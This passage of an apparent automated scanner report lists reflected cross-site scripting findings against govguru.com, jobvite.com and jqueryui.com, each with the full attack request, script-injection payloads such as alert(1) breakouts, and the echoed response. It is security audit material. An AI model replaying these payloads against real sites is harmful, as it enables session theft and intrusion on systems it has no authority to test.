Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CGJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmsqeeAmKAGSBCeJC5EmquI3yjbAwiBDeJWGEmrX5yd4zACLBEe; PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B; PRimp=CA9A0400-789E-8A09-0309-05A001920102; PRca=|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 27 Jan 2011 19:25:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1166930' src='http://ads.pointroll.com/PortalServe/?pid=1166930O62320101223173924&cid=1423823&pos=h&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/
...[SNIP]...
yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c%3F$CTURL$&time=4|13:19|-693bab";alert(1)//ee44a590352&r=0.09495983109809458&flash=10&server=polRedir' width='728' height='90' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.5. http://govguru.com/north-carolina/boat-registration [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://govguru.com
Path:   /north-carolina/boat-registration

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c938"><img%20src%3da%20onerror%3dalert(1)>d183c434106 was submitted in the REST URL parameter 1. This input was echoed as 5c938"><img src=a onerror=alert(1)>d183c434106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /north-carolina5c938"><img%20src%3da%20onerror%3dalert(1)>d183c434106/boat-registration HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:42:29 GMT
Keep-Alive: timeout=5, max=100
Expires: Fri, 28 Jan 2011 00:42:29 GMT
Connection: close
Set-Cookie: symfony=va581us05gjud7elcnd7ekr5j1; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 21666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

       
   <meta http-equiv="Con
...[SNIP]...
<input class="text" type="text" name="q" value="north carolina5c938"><img src=a onerror=alert(1)>d183c434106 boat registration" />
...[SNIP]...

3.6. http://govguru.com/north-carolina/boat-registration [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://govguru.com
Path:   /north-carolina/boat-registration

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43a93"%3bcea0d4b1bdb was submitted in the REST URL parameter 1. This input was echoed as 43a93";cea0d4b1bdb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /north-carolina43a93"%3bcea0d4b1bdb/boat-registration HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:42:31 GMT
Keep-Alive: timeout=5, max=97
Expires: Fri, 28 Jan 2011 00:42:31 GMT
Connection: close
Set-Cookie: symfony=94mbeh70dbhilfe1imdevta5g1; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 21214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

       
   <meta http-equiv="Con
...[SNIP]...
<!--
s.pageName="All States Search north carolina43a93";cea0d4b1bdb boat registration";
s.eVar1=s.prop1="govguru.com";
s.eVar2=s.prop2="Search";
s.eVar3=s.prop3="north carolina43a93\";cea0d4b1bdb boat registration";
s.eVar4=s.prop4="All States";
s.eVar5="north carolin
...[SNIP]...

3.7. http://govguru.com/north-carolina/boat-registration [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://govguru.com
Path:   /north-carolina/boat-registration

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 671f2"%3b9efa48339dd was submitted in the REST URL parameter 2. This input was echoed as 671f2";9efa48339dd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /north-carolina/boat-registration671f2"%3b9efa48339dd HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:43:15 GMT
Keep-Alive: timeout=5, max=96
Expires: Fri, 28 Jan 2011 00:43:15 GMT
Connection: close
Set-Cookie: symfony=1qd7onvan34ppanldsl4or64j4; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 20473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

       
   <meta http-equiv="Con
...[SNIP]...
<!--
s.pageName="All States Search boat registration671f2";9efa48339dd";
s.eVar1=s.prop1="govguru.com";
s.eVar2=s.prop2="Search";
s.eVar3=s.prop3="boat registration671f2\";9efa48339dd";
s.eVar4=s.prop4="All States";
s.eVar5="boat registration671f2\";9efa48339dd";


s.cha
...[SNIP]...

3.8. http://govguru.com/north-carolina/boat-registration [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://govguru.com
Path:   /north-carolina/boat-registration

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d091"><img%20src%3da%20onerror%3dalert(1)>097a291560e was submitted in the REST URL parameter 2. This input was echoed as 1d091"><img src=a onerror=alert(1)>097a291560e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /north-carolina/boat-registration1d091"><img%20src%3da%20onerror%3dalert(1)>097a291560e HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:43:13 GMT
Keep-Alive: timeout=5, max=99
Expires: Fri, 28 Jan 2011 00:43:13 GMT
Connection: close
Set-Cookie: symfony=f8pnd0qn4huae44nobtshdqf45; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 20574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

       
   <meta http-equiv="Con
...[SNIP]...
<input class="text" type="text" name="q" value="boat registration1d091"><img src=a onerror=alert(1)>097a291560e" />
...[SNIP]...

3.9. http://govguru.com/north-carolina/boat-registration [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://govguru.com
Path:   /north-carolina/boat-registration

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 66345'><script>alert(1)</script>658c07cccb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /north-carolina/boat-registration?66345'><script>alert(1)</script>658c07cccb0=1 HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:41:58 GMT
Keep-Alive: timeout=5, max=92
Expires: Fri, 28 Jan 2011 00:41:58 GMT
Connection: close
Set-Cookie: symfony=2p103sls2khnubnvrh7r3sm8n2; path=/
Set-Cookie: loc-1=%2Fnorth-carolina; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 93416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

       
   <meta http-equiv="Con
...[SNIP]...
<option value='/boat-registration?66345'><script>alert(1)</script>658c07cccb0=1' >
...[SNIP]...

3.10. http://govguru.com/north-carolina/boat-registration [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://govguru.com
Path:   /north-carolina/boat-registration

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d43"><script>alert(1)</script>e70e52d1510 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /north-carolina/boat-registration?89d43"><script>alert(1)</script>e70e52d1510=1 HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:41:53 GMT
Keep-Alive: timeout=5, max=64
Expires: Fri, 28 Jan 2011 00:41:53 GMT
Connection: close
Set-Cookie: symfony=9r2r7aqn70j46rbc3dsh950qp0; path=/
Set-Cookie: loc-1=%2Fnorth-carolina; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 93590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

       
   <meta http-equiv="Con
...[SNIP]...
<a href="/boat-registration?89d43"><script>alert(1)</script>e70e52d1510=1" title="U.S. Boat Registration">
...[SNIP]...

3.11. http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7246e</script><script>alert(1)</script>0b363216a36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh&7246e</script><script>alert(1)</script>0b363216a36=1 HTTP/1.1
Host: hire.jobvite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nc5bqb45d2gjpv2j3d3qgwfc; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=8e125cb6-e875-4356-a3f3-ea1fa0da79e7; expires=Sat, 26-Feb-2011 19:13:22 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 27 Jan 2011 19:13:22 GMT
Connection: close
Content-Length: 46859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<link href="http://hire.jo
...[SNIP]...
<!--
jvurlargs = '?c=qXY9VfwJ&7246e</script><script>alert(1)</script>0b363216a36=1&cs=93q9Vfwh&su=fsY9Vfwe';
jvurlargsclean = '?c=qXY9VfwJ&7246e</script>
...[SNIP]...

3.12. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fc42"><script>alert(1)</script>7b6e381a9c0 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F88fc42"><script>alert(1)</script>7b6e381a9c0&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F88fc42"><script>alert(1)</script>7b6e381a9c0&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHi
...[SNIP]...

3.13. http://jqueryui.com/themeroller/ [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dc45"><script>alert(1)</script>f43f5c2ec6a was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF5dc45"><script>alert(1)</script>f43f5c2ec6a&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ld&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF5dc45"><script>alert(1)</script>f43f5c2ec6a&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault
...[SNIP]...

3.14. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ce41"><script>alert(1)</script>392cbdd1c3d was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF9ce41"><script>alert(1)</script>392cbdd1c3d&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF9ce41"><script>alert(1)</script>392cbdd1c3d&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHo
...[SNIP]...

3.15. http://jqueryui.com/themeroller/ [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 911ae"><script>alert(1)</script>e29864d36d2 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF911ae"><script>alert(1)</script>e29864d36d2&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF911ae"><script>alert(1)</script>e29864d36d2&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35
...[SNIP]...

3.16. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
